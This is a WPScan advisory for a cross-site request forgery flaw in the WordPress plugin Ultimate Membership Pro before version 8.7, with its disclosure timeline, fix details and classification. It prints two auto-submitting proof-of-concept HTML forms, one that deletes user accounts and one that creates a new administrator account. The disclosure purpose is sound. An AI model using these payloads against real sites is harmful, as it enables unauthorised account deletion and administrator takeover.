WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Ultimate Membership Pro < 8.7 - Cross-Site Request Forgery allowing Arbitrary Account Deletion and Creation

Description

While confirming the issues from https://wpvulndb.com/vulnerabilities/10086 have been remediated, two CSRF issues were identified, allowing attackers to make logged in administrator delete arbitrary accounts, as well as create a new administrator account. Other CSRF may be present but haven't been checked.


February 17th, 2020 - Envato Notified
February 22nd, 2020 - New version released (8.7), fixing the reported issues, as well as putting CSRF checks on all other actions as per recommendations.

Proof of Concept

<html>
  <body onload="document.forms[0].submit();">
    <form action="https://examle.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST">
      <input type="hidden" name="ihc_limit" value="25" />
      <input type="hidden" name="delete_users[]" value="5" />
      <input type="hidden" name="delete" value="Delete" />
    </form>
  </body>
</html>


<html>
  <!-- Account will not show up in the plugin's users list (because of admin role), but will be in the WP users list -->
 <body onload="document.forms[0].submit();">
    <form action="https://example.com/wp-admin/admin.php?page=ihc_manage&tab=users" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user_login" value="admin-csrf" />
      <input type="hidden" name="user_email" value="[email protected]" />
      <input type="hidden" name="first_name" value="Admin" />
      <input type="hidden" name="last_name" value="CSRF" />
      <input type="hidden" name="pass1" value="Passw0rd" />
      <input type="hidden" name="pass2" value="Passw0rd" />
      <input type="hidden" name="role" value="administrator" />
      <input type="hidden" name="ihc_user_levels" value="-1" />
      <input type="hidden" name="ihc_overview_post" value="-1" />
      <input type="hidden" name="Submit" value="Register" />
    </form>
  </body>
</html> 

Affects Plugins

indeed-membership-pro
Fixed in version 8.7

References

URL
https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
URL
https://blog.wpscan.com/wpvulndb/report/2020/03/06/ultimate-membership-pro-recent-vulnerabilities-breakdown.html

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

ErwanLR

Submitter website
https://wpscan.org
Submitter twitter
erwan_lr
Verified

Yes

WPVDB ID
136f270c-4601-4484-a57b-c824956c8ef0

Timeline

Publicly Published

2020-02-24 (about 2 years ago)

Added

2020-02-24 (about 2 years ago)

Last Updated

2020-03-07 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us